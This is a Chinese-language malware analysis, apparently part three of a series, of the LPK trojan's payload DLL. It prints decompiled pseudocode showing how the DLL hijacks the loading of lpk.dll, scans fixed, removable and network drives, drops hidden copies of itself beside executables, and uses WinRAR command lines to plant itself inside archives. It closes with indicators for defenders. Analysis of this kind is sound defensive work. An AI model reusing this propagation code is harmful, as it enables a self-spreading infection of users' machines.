LPK木马分析-03
作者:互联网
序言
前面分析的是主程序, 下面分析载荷: 它把自身 (lpk.dll) 复制到每一个含有 exe 文件的目录中 (以及 rar/zip 压缩包内部). lpk.dll 是系统 DLL, 放在 exe 同目录后会被宿主程序优先加载, 这就是经典的 DLL 搜索顺序劫持; 载荷自己再去加载系统目录下真正的 lpk.dll 以保持宿主正常运行 (见入口点末尾的 sub_100010CE).
总览
// DLL entry point of the payload (Hex-Rays pseudocode, reproduced as-is from the sample).
// fdwReason == 1 is DLL_PROCESS_ATTACH and 0 is DLL_PROCESS_DETACH; thread attach/detach
// notifications are switched off below, so only those two paths matter.
// Globals written here and read by the worker thread: hModule, Filename (full path of this
// DLL copy, later the CopyFileW source in StartAddress), hEvent (manual-reset stop signal)
// and hObject (worker thread handle, created in sub_100019E6).
// Returns: on attach, the result of sub_100010CE(); on every other reason, 1.
BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
BOOL result; // eax@9
if ( fdwReason == 1 ) // DLL_PROCESS_ATTACH
{
hModule = hinstDLL;
GetModuleFileNameW(hinstDLL, (LPWSTR)&Filename, 0x104u); // 0x104 = MAX_PATH; path of this lpk.dll copy
DisableThreadLibraryCalls(hinstDLL); // no DLL_THREAD_ATTACH/DETACH callbacks for this module
if ( sub_10001134() == 1 ) // per the author: fetches the resource string "Ghijkl Nopqrstu Wxy" (a marker check covered in the earlier parts)
{
if ( !sub_10001338() && !sub_100012BD() ) // per the author: host exe name does not start with "hrl", and the single-instance mutex did not already exist
sub_10001193();
if ( sub_100012F6() == 1 )
{
hEvent = CreateEventW(0, 1, 0, 0); // manual-reset, initially non-signaled; the directory walker polls it (WaitForSingleObject(hEvent, 0x14)) as its stop flag
if ( hEvent )
sub_100019E6(); // key function: starts the drive-scanning worker thread (see below)
}
}
result = sub_100010CE(); // per the author: loads the genuine lpk.dll from the system directory (proxy-DLL behaviour); presumably a BOOL, so the host's LoadLibrary fails if the real DLL cannot be loaded
}
else
{
if ( !fdwReason ) // DLL_PROCESS_DETACH
{
if ( hEvent )
{
SetEvent(hEvent); // ask the worker to stop ...
WaitForSingleObject(hObject, 0xFFFFFFFF); // ... and wait for it (INFINITE). NOTE(review): blocking on a thread from DllMain while holding the loader lock is a classic deadlock hazard on FreeLibrary; on process exit the worker is already terminated and the wait returns at once. hObject may be 0 if sub_100019E6 failed, in which case the wait simply fails.
CloseHandle(hObject);
CloseHandle(hEvent);
}
sub_10001123(); // per the author: release/cleanup
}
result = 1;
}
return result;
}
函数 0x100019E6 (注意: 上面入口点里的 sub_10001123 是卸载时的释放函数, 下面要看的是启动工作线程的 sub_100019E6)
// Starts the worker thread that scans drives (sub_100018D3). The thread is created
// suspended (flag 4 = CREATE_SUSPENDED), dropped to THREAD_PRIORITY_IDLE
// (0xFFFFFFF1 == -15, keeps the spreading inconspicuous) and then resumed. Its handle
// is kept in the global hObject so DLL_PROCESS_DETACH can wait for it.
// Returns: ResumeThread's previous suspend count on success, otherwise the result of
// TerminateThread; the caller in DllEntryPoint ignores the value.
DWORD sub_100019E6()
{
DWORD result; // eax@2
hObject = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)sub_100018D3, 0, 4u, 0); // CREATE_SUSPENDED
// A NULL handle from CreateThread is not checked explicitly: SetThreadPriority(NULL)
// fails, which funnels into the same cleanup path and leaves hObject == 0.
if ( !SetThreadPriority(hObject, 0xFFFFFFF1) || (result = ResumeThread(hObject), result == 0xFFFFFFFF) )
{
result = TerminateThread(hObject, 0); // could not lower priority or resume: kill the thread; its handle is dropped without CloseHandle
hObject = 0;
}
return result;
}
// Worker thread started by sub_100019E6: repeatedly enumerates drive letters and
// launches one StartAddress thread per eligible drive.
// Stack layout (from the decompiler's frame offsets): Handles at bp-0xC0 and v10 at
// bp-0x60 are 0x60 bytes apart, i.e. Handles is an array of 24 thread handles and v10
// a 24-entry DWORD table, one slot per drive index 2..25 (StartAddress adds the index
// to L"A:\\", so this covers C: through Z:; A: and B: are never scanned).
// Returns: the thread exit code; nothing reads it.
int __stdcall sub_100018D3()
{
DWORD v0; // edi@1 -- number of live StartAddress threads stored in Handles
int v1; // ebx@2 -- drive index (2 == C:)
char *v2; // ebp@2 -- cursor over the per-drive "already has a thread" table
HANDLE v3; // eax@5
HANDLE *v4; // esi@5
DWORD v5; // esi@11
int result; // eax@16
DWORD v7; // esi@18
signed int v8; // [sp+10h] [bp-C4h]@2 -- remaining drive slots (24)
HANDLE Handles; // [sp+14h] [bp-C0h]@5 -- 24 thread handles (see layout note above)
char v10; // [sp+74h] [bp-60h]@1 -- 24 DWORD flags, 1 = drive already has a thread
v0 = 0;
RtlZeroMemory(&v10, 0x60);
do
{
v1 = 2;
v2 = &v10;
v8 = 24;
do
{
// Skip drives that already have a thread. DriveType() is not shown; if it wraps
// GetDriveTypeW, the (x - 2) <= 2 test selects 2/3/4 = DRIVE_REMOVABLE, DRIVE_FIXED,
// DRIVE_REMOTE and skips unknown, no-root, CD-ROM and RAM disks -- USB sticks and
// network shares are in scope, which is how the dropper moves between machines.
if ( *(_DWORD *)v2 != 1 && (unsigned int)(DriveType(v1) - 2) <= 2 )
{
// The drive index is smuggled through the LPVOID parameter; StartAddress treats
// values below 0x100 as a drive index and anything else as a path string.
v3 = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)StartAddress, (LPVOID)v1, 4u, 0); // CREATE_SUSPENDED
v4 = &Handles + v0;
*v4 = v3;
if ( v3 )
{
if ( SetThreadPriority(v3, 0xFFFFFFF1) != 1 || ResumeThread(*v4) == 0xFFFFFFFF ) // THREAD_PRIORITY_IDLE
{
// The killed thread's handle stays in Handles[v0] without a CloseHandle and v0
// is not advanced, so the slot is overwritten by the next success (handle leak);
// the drive keeps flag 0 and is retried on the next pass.
TerminateThread(*v4, 0);
}
else
{
++v0;
*(_DWORD *)v2 = 1;
}
}
}
++v1;
v2 += 4;
--v8;
}
while ( v8 );
v5 = 0;
// Non-blocking poll (timeout 0, bWaitAll = 1): returns WAIT_TIMEOUT (0x102) unless every
// drive thread has exited. Once they all have, close them and clear the flag table so the
// next pass re-scans every drive -- a newly inserted removable disk gets a thread again.
if ( v0 && WaitForMultipleObjects(v0, &Handles, 1, 0) != 0x102 )
{
RtlZeroMemory(&v10, 0x60);
if ( v0 )
{
do
CloseHandle(*(&Handles + v5++));
while ( v5 < v0 );
}
v0 = 0;
}
result = sub_10001606(); // not shown; presumably the pause / "keep going" check between passes (hEvent is the stop signal elsewhere) -- confirm against the earlier parts
}
while ( result == 1 );
// Shutdown: block until all outstanding drive threads finish, then close their handles.
if ( v0 )
{
result = WaitForMultipleObjects(v0, &Handles, 1, 0xFFFFFFFF);
v7 = 0;
if ( v0 )
{
do
result = CloseHandle(*(&Handles + v7++));
while ( v7 < v0 );
}
}
return result;
}
函数 StartAddress
函数功能: 遍历一个盘符 (或指定路径) 下的所有文件夹, 递归查找 .exe、.rar、.zip 等文件. 在每个含有 .exe 的目录中, 若尚无 lpk.dll, 就把自身 (Filename) 复制为该目录下的 lpk.dll, 并用 SetFileAttributesW(..., 7) 设为只读+隐藏+系统 (1|2|4); 对 .rar/.zip 文件, 只处理大小小于 0x3200000 (50 MiB, 且高 32 位为 0) 的, 交给 sub_1000142B 植入. 线程参数小于 0x100 时视为盘符索引 ('A' + 索引), 否则视为路径字符串. 每处理一个文件就以 20ms (0x14) 超时轮询一次 hEvent, 事件被置位即退出. 下面只摘录关键片段:
if ( (unsigned int)lpThreadParameter >= 0x100 )
{
lstrcpyW(&String1, (LPCWSTR)lpThreadParameter); //
}
else
{
lstrcpyW(&String1, L"A:\\");
String1 += (unsigned __int16)lpThreadParameter;
}
lstrcpyW(&String2, &String1); // 从C盘根目录开始
PathAppendW(&String1, &word_10002374);
hFindFile = FindFirstFileW(&String1, &FindFileData); //找第一个文件
....
while ( 1 )
{
if ( !lstrcmpiW(FindFileData.cFileName, L".") || !lstrcmpiW(FindFileData.cFileName, L"..") )// 忽略.和.., 这两个结果
goto LABEL_27;
if ( FindFileData.dwFileAttributes & 0x10 ) // 是否是目录
break;
v2 = PathFindExtensionW(FindFileData.cFileName);
lpString2 = v2;
if ( v2 )
{
if ( !lstrcmpiW(v2, L".EXE") ) // 查找exe文件
{
lstrcpyW(&String2, &String1);
PathAppendW(&String2, L"lpk.dll");
if ( GetFileAttributesW(&String2) != 0xFFFFFFFF )
goto LABEL_27;
CopyFileW(&Filename, &String2, 1); //复制到文件夹中
SetFileAttributesW(&String2, 7u);
}
if ( (!lstrcmpiW(lpString2, L".RAR") || !lstrcmpiW(lpString2, L".ZIP")) // 查找压缩文件
&& !FindFileData.nFileSizeHigh
&& FindFileData.nFileSizeLow < 0x3200000 )
{
lstrcpyW(&String2, &String1);
PathAppendW(&String2, FindFileData.cFileName);// 文件完整路径
sub_1000142B((int)&String2);
}
}
if ( WaitForSingleObject(hEvent, 0x14u) != 258 )
goto LABEL_14;
LABEL_27:
if ( FindNextFileW(hFindFile, &FindFileData) != 1 )
goto LABEL_15;
}
函数 0x1000142B
函数功能: 借助本机安装的 WinRAR 把 lpk.dll 植入压缩包. 先读注册表 HKCR\WinRAR\shell\open\command 定位 WinRAR 目录并确认同目录下存在 rar.exe (没有 WinRAR 则压缩包不受影响); 然后用 `cmd /c rar vb "<压缩包>" lpk.dll | find /i "lpk.dll"` 检查包内是否已有 lpk.dll; 没有则用 `rar x` 把包内的 *.exe 解压到 %TEMP% 下以 IRAR 为前缀的临时目录, 调用 StartAddress 在该目录 (含子目录) 旁放置 lpk.dll, 再用 `rar a -r -ep1` 把 lpk.dll 打包回原压缩包, 最后 `cmd /c RD /s /q` 递归删除临时目录. sub_10001398 的第二个参数 (0xEA60 = 60s, 0x1D4C0 = 120s, 0x3A980 = 240s) 推测是执行命令行的超时时间 (毫秒), 待确认. 以下为片段:
v8 = 0x208;
result = (_WORD *)SHRegGetValueW(HKEY_CLASSES_ROOT, L"WinRAR\\shell\\open\\command", 0, 2, 0, &String1, &v8);
if ( !result )
{
if ( String1 == '"' )
{
lstrcpyW(&String1, &String2);
v2 = L"\"";
}
else
{
v2 = L" ";
}
result = (_WORD *)StrStrIW(&String1, v2);
if ( result )
{
*result = 0;
PathRemoveFileSpecW(&String1);
PathAppendW(&String1, L"rar.exe");
result = (_WORD *)GetFileAttributesW(&String1);
if ( result != (_WORD *)0xFFFFFFFF )
{
PathGetShortPath(&String1);
GetTempPathW(0x104u, &Buffer);
v3 = GetCurrentThreadId();
GetTempFileNameW(&Buffer, L"IRAR", v3, &Buffer);
wsprintfW(&CommandLine, L"cmd /c %s vb \"%s\" lpk.dll|find /i \"lpk.dll\"", &String1, a1, &Buffer);
result = (_WORD *)sub_10001398(&CommandLine, 0xEA60u);// 看是否存在lpk.dll文件
if ( result ) // 不存在
{
wsprintfW(&CommandLine, L"\"%s\" x \"%s\" *.exe \"%s\\\"", &String1, a1, &Buffer);// String1 = rar.exe
sub_10001398(&CommandLine, 0x1D4C0u); // 解压
StartAddress(&Buffer);
wsprintfW(&CommandLine, L"\"%s\" a -r -ep1\"%s\" \"%s\" \"%s\\lpk.dll\"", &String1, &Buffer, a1, &Buffer);
sub_10001398(&CommandLine, 0x3A980u); // 压缩
wsprintfW(&CommandLine, L"cmd /c RD /s /q \"%s\"", &Buffer);// 递归删除文件
result = (_WORD *)sub_10001398(&CommandLine, 0xEA60u);
}
}
}
}
总结
总的来说, 这个载荷不算太难: 入口点启动一个空闲优先级的工作线程, 按盘符 (C: 到 Z:, 含可移动盘和网络盘) 遍历目录, 给每个含 exe 的目录放一个隐藏的 lpk.dll, 并借助本机 WinRAR 把 lpk.dll 塞进压缩包. 对防御方而言, 可关注的特征有: exe 同目录下属性为只读+隐藏+系统的 lpk.dll、%TEMP% 下的 IRAR* 临时目录、以及由非交互进程通过 cmd /c 调用 rar.exe 并用 find /i "lpk.dll" 过滤输出的行为; 同时要记住 hObject/hEvent 等状态都是全局变量, 宿主进程卸载该 DLL 时会在 DllMain 里等待工作线程退出. 有机会可以按照这个思路, 在隔离环境里自己复现一遍分析过程.